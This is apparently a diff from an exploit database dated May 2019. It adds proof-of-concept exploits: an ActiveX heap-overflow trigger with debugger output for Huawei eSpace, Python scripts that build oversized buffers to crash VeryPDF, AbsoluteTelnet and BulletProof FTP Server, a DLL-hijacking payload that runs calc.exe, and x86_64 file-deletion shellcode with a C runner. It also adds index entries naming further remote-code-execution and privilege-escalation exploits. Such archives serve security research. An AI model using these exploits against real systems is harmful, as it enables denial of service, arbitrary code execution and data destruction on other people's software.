+04170024  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170034  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170044  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170054  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170064  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170074  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170084  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170094  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+
+
+eSpaceStatusCtrl.dll PoC and debug output:
+
+<object classid='clsid:93A44D3B-7CED-454F-BBB4-EE0AA340BB78' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Program Files\eSpace-ecs\eSpaceStatusCtrl.dll"
+prototype  = "Sub SetUserInfo ( ByVal strAccount As String ,  ByVal staffNo As String ,  ByVal strName As String ,  ByVal status As Long )"
+memberName = "SetUserInfo"
+progid     = "eSpaceStatusCtrlLib.StatusCtrl"
+argCount   = 4
+arg1="defaultV"
+arg2="defaultV"
+arg3=String(14356, "A")
+arg4=1
+target.SetUserInfo arg1 ,arg2 ,arg3 ,arg4 
+
+0:005> r
+eax=feeefeee ebx=02813550 ecx=feeefeee edx=feeefeee esi=0281369c edi=02813698
+eip=776def10 esp=029dfd60 ebp=029dfd74 iopl=0         nv up ei ng nz ac po cy
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010293
+ntdll!RtlEnterCriticalSection+0x4a:
+776def10 83790800        cmp     dword ptr [ecx+8],0  ds:0023:feeefef6=????????

exploits/windows/dos/46871.py

@@ -0,0 +1,21 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Encrypt PDF v2.3 - Denial of Service (PoC)
+# Date: 19/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.verypdf.com
+# Software: http://www.verypdf.com/encryptpdf/encryptpdf.exe
+# Version: 2.3
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "EncryptPDF.py", it will create a new file "EncryptPDF.txt"
+# 2.- Copy the text from the generated EncryptPDF.txt file to clipboard
+# 3.- Open Encrypt PDF v2.3
+# 4.- Go to 'Setting', paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'
+# 5.- Click on 'Open PDF(s)', when you import a pdf file, you will see a crash
+
+buffer = "\x41" * 1000
+
+f = open ("EncryptPDF.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/46872.py

@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: VeryPDF PCL Converter v2.7 - Denial of Service (PoC)
+# Date: 19/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.verypdf.com
+# Software: http://www.verypdf.com/pcltools/pcl-converter.exe
+# Version: 2.7
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "PCLConverter.py", it will create a new file "PCLConverter.txt"
+# 2.- Copy the text from the generated PCLConverter.txt file to clipboard
+# 3.- Open VeryPDF PCL Converter v2.7 
+# 4.- Go to 'Setting' > 'PDF Security'
+# 5.- Mark 'Encrypt PDF File' and paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'
+# 6.- Click on 'Add File(s)', and select a pcl file, e.g. 'sample.pcl'
+# 7.- Click on 'Start', you will see a crash
+
+buffer = "\x41" * 3000
+f = open ("PCLConverter.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/46873.py

@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Document Converter (docPrint Pro) v8.0 - Denial of Service (PoC)
+# Date: 19/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.verypdf.com
+# Software: http://dl.verypdf.net/docprint_pro_setup.exe
+# Version: 8.0
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "DocConverter.py", it will create a new file "DocConverter.txt"
+# 2.- Copy the text from the generated DocConverterr.txt file to clipboard
+# 3.- Open docPrint Document Converter
+# 4.- Go to 'Setting' > 'PDF Security'
+# 5.- Mark 'Encrypt PDF File' and paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'
+# 6.- Click on 'Add File(s)', and select a supported file, e.g. 'sample.doc'
+# 7.- Click on 'Start', you will see a crash
+
+buffer = "\x41" * 3000
+f = open ("DocConverter.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/46874.py

@@ -0,0 +1,21 @@
+#Exploit Title: AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-19
+#Vendor Homepage: https://www.celestialsoftware.net/
+#Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet10.16.exe
+#Tested Version: 10.16
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: AbsoluteTelent.py
+#2.- Open AbsoluteTelent.txt and copy content to clipboard
+#3.- Open AbsoluteTelnet.exe
+#4.- Select "Help" > "Enter License Key"
+#5.- In "License Name" paste Clipboard
+#6.- Crashed
+
+cod = "\x41" * 2500
+
+f = open('AbsoluteTelent.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/46875.py

@@ -0,0 +1,22 @@
+#Exploit Title: BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-18
+#Vendor Homepage: http://bpftpserver.com/
+#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download
+#Tested Version: 2019.0.0.50
+#Tested on: Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: BulletProof_DNS_Server_2019.0.0.50.py
+#2.- Open bullet_storage.txt and copy content to clipboard
+#3.- Open BulletProof FTP Server
+#4.- Select "Settings" > "Protocols" > "FTP" > "Firewall"
+#5.- Enable "DNS Address" and Paste Clipboard
+#6.- Click on "Test"
+#7.- Crashed
+
+cod = "\x41" * 700
+
+f = open('bullet_dns.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/46876.py

@@ -0,0 +1,22 @@
+#Exploit Title: BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-18
+#Vendor Homepage: http://bpftpserver.com/
+#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download
+#Tested Version: 2019.0.0.50
+#Tested on: Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: BulletProof_Storage_Server_2019.0.0.50.py
+#2.- Open bullet_storage.txt and copy content to clipboard
+#3.- Open BulletProof FTP Server
+#4.- Select "Settings" > "Advanced"
+#5.- Enable "Override Storage-Path" and Paste Clipboard
+#6.- Click on "Save"
+#7.- Crashed
+
+cod = "\x41" * 500
+
+f = open('bullet_storage.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/local/46866.c

@@ -0,0 +1,53 @@
+/*
+
+Huawei eSpace Desktop DLL Hijacking Vulnerability
+
+
+Vendor: Huawei Technologies Co., Ltd.
+Product web page: https://www.huawei.com
+Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
+
+Summary: Create more convenient Enhanced Communications (EC) services for your
+enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines
+voice, data, video, and service streams, and provides users with easy and secure
+access to their service platform from any device, in any place, at any time. The
+eSpace Meeting allows you to join meetings that support voice, data, and video
+functions using the PC client, the tablet client, or an IP phone, or in a meeting
+room with an MT deployed.
+
+Desc: eSpace suffers from a DLL Hijacking issue. The vulnerability is caused due
+to the application loading libraries (mfc71enu.dll, mfc71loc.dll, tcapi.dll and 
+airpcap.dll) in an insecure manner. This can be exploited to load arbitrary libraries
+by tricking a user into opening a related application file (.html, .jpg, .png)
+located on a remote WebDAV or SMB share.
+
+Tested on: Microsoft Windows 7 Professional
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+
+19.08.2014
+
+Patched version: V200R003C00
+Vuln ID: HWPSIRT-2014-1153 and HWPSIRT-2014-1154
+CVE ID: CVE-2014-9416
+Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589
+
+*/
+
+
+// gcc -shared -o mfc71enu.dll exploit.c
+
+#include <windows.h> 
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
+{
+	exec();
+	return 0;
+}
+
+int exec()
+{
+	WinExec("calc.exe" , SW_NORMAL);
+	return 0;
+}

files_exploits.csv

@@ -6436,6 +6436,15 @@ id,file,description,date,author,type,platform,port
 46857,exploits/windows/dos/46857.py,"ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC)",2019-05-16,"Victor Mondragón",dos,windows,
 46858,exploits/windows/dos/46858.py,"Axessh 4.2 - 'Log file name' Denial of Service (PoC)",2019-05-16,"Victor Mondragón",dos,windows,
 46859,exploits/windows/dos/46859.py,"SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service",2019-05-16,LiquidWorm,dos,windows,
+46865,exploits/windows/dos/46865.py,"Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)",2019-05-20,LiquidWorm,dos,windows,
+46867,exploits/windows/dos/46867.txt,"Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow",2019-05-20,LiquidWorm,dos,windows,
+46868,exploits/windows/dos/46868.txt,"Huawei eSpace 1.1.11.103 - 'ContactsCtrl.dll' / 'eSpaceStatusCtrl.dll' ActiveX Heap Overflow",2019-05-20,LiquidWorm,dos,windows,
+46871,exploits/windows/dos/46871.py,"Encrypt PDF 2.3 - Denial of Service (PoC)",2019-05-20,"Alejandra Sánchez",dos,windows,
+46872,exploits/windows/dos/46872.py,"PCL Converter 2.7 - Denial of Service (PoC)",2019-05-20,"Alejandra Sánchez",dos,windows,
+46873,exploits/windows/dos/46873.py,"docPrint Pro 8.0 - Denial of Service (PoC)",2019-05-20,"Alejandra Sánchez",dos,windows,
+46874,exploits/windows/dos/46874.py,"AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)",2019-05-20,"Victor Mondragón",dos,windows,
+46875,exploits/windows/dos/46875.py,"BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)",2019-05-20,"Victor Mondragón",dos,windows,
+46876,exploits/windows/dos/46876.py,"BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)",2019-05-20,"Victor Mondragón",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10393,7 +10402,7 @@ id,file,description,date,author,type,platform,port
 46104,exploits/windows/local/46104.txt,"Microsoft Windows - DSSVC CheckFilePermission Arbitrary File Deletion",2019-01-09,"Google Security Research",local,windows,
 46107,exploits/windows/local/46107.py,"RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)",2019-01-10,bzyo,local,windows,
 46120,exploits/windows/local/46120.py,"Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)",2019-01-11,bzyo,local,windows,
-46142,exploits/solaris/local/46142.sh,"xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)",2019-01-14,"Marco Ivaldi",local,solaris,
+46142,exploits/solaris/local/46142.sh,"xorg-x11-server < 1.20.3 (Solaris 11) - 'inittab Local Privilege Escalation",2019-01-14,"Marco Ivaldi",local,solaris,
 46155,exploits/windows/local/46155.c,"Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation",2019-01-14,"Parvez Anwar",local,windows,
 46156,exploits/windows/local/46156.txt,"Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
 46157,exploits/windows/local/46157.txt,"Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Open Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
@@ -10485,6 +10494,10 @@ id,file,description,date,author,type,platform,port
 46863,exploits/windows/local/46863.txt,"Iperius Backup 6.1.0 - Privilege Escalation",2019-05-17,bzyo,local,windows,
 46851,exploits/windows/local/46851.txt,"VMware Workstation 15.1.0 - DLL Hijacking",2019-05-16,"Miguel Mendez Z. & Claudio Cortes C.",local,windows,
 46854,exploits/windows/local/46854.py,"JetAudio jetCast Server 2.0 - 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow",2019-05-16,"Connor McGarr",local,windows,
+46866,exploits/windows/local/46866.c,"Huawei eSpace 1.1.11.103 - DLL Hijacking",2019-05-20,LiquidWorm,local,windows,
+46877,exploits/solaris/local/46877.c,"Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation",2019-05-20,"Marco Ivaldi",local,solaris,
+46878,exploits/solaris/local/46878.c,"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)",2019-05-20,"Marco Ivaldi",local,solaris,
+46879,exploits/solaris/local/46879.c,"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",2019-05-20,"Marco Ivaldi",local,solaris,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17419,6 +17432,7 @@ id,file,description,date,author,type,platform,port
 46813,exploits/multiple/remote/46813.rb,"PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,5432
 46814,exploits/multiple/remote/46814.rb,"Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,7001
 46839,exploits/php/remote/46839.rb,"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)",2019-05-14,AkkuS,remote,php,
+46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41289,3 +41303,4 @@ id,file,description,date,author,type,platform,port
 46850,exploits/php/webapps/46850.txt,"Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting",2019-05-15,LiquidWorm,webapps,php,
 46852,exploits/php/webapps/46852.txt,"DeepSound 1.0.4 - SQL Injection",2019-05-16,"Mehmet EMIROGLU",webapps,php,80
 46864,exploits/php/webapps/46864.txt,"Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution",2019-05-17,"numan türle",webapps,php,
+46869,exploits/php/webapps/46869.py,"eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution",2019-05-20,liquidsky,webapps,php,

files_shellcodes.csv

@@ -965,3 +965,4 @@ id,file,description,date,author,type,platform
 46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - shred file Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86
 46809,shellcodes/linux_x86/46809.c,"Linux/x86 - execve /bin/sh Shellcode (20 bytes)",2019-05-08,Rajvardhan,shellcode,linux_x86
 46829,shellcodes/linux_x86/46829.c,"Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)",2019-05-13,"Xavi Beltran",shellcode,linux_x86
+46870,shellcodes/linux_x86-64/46870.c,"Linux x86_64 - Delete File Shellcode (28 bytes)",2019-05-20,"Aron Mihaljevic",shellcode,linux_x86-64

shellcodes/linux_x86-64/46870.c

@@ -0,0 +1,63 @@
+;Title: Linux/x86_64 - delete  
+;Author: Aron Mihaljevic
+;Architecture: Linux x86_64
+;Shellcode Length:  28 bytes
+
+
+This shellcode deletes file declared in "fname"
+
+
+==================ASSEMBLY ========================================
+
+global _start
+
+section .text
+
+_start:
+
+        jmp short _file
+
+
+delete:
+        push 87                             ;sys_unlink
+        pop rax
+        pop rdi                             ;fname
+        syscall
+
+exit:
+        xor rax,        rax
+        mov al,         60                  ;sys_exit
+        syscall
+
+
+_file:
+
+call delete
+fname: db "test.txt"
+
+
+
+=======Generate Shellcode==========================================
+nasm -felf64 delete.nasm -o delete.o 
+ld delete.o -o delete
+
+
+
+========C program ================================================
+//gcc -fno-stack-protector -z execstack delete.c
+
+#include <stdio.h>
+#include <string.h>
+
+char sh[]="\xeb\x0d\x6a\x57\x58\x5f\x0f\x05\x48"
+          "\x31\xc0\xb0\x3c\x0f\x05\xe8\xee\xff"
+          "\xff\xff\x74\x65\x73\x74\x2e\x74\x78\x74";
+
+
+void main(int argc, char **argv)
+{
+        printf("Shellcode Length: %d\n", strlen (sh));
+        int (*func)();
+        func = (int (*)()) sh;
+        (int)(*func)();
+}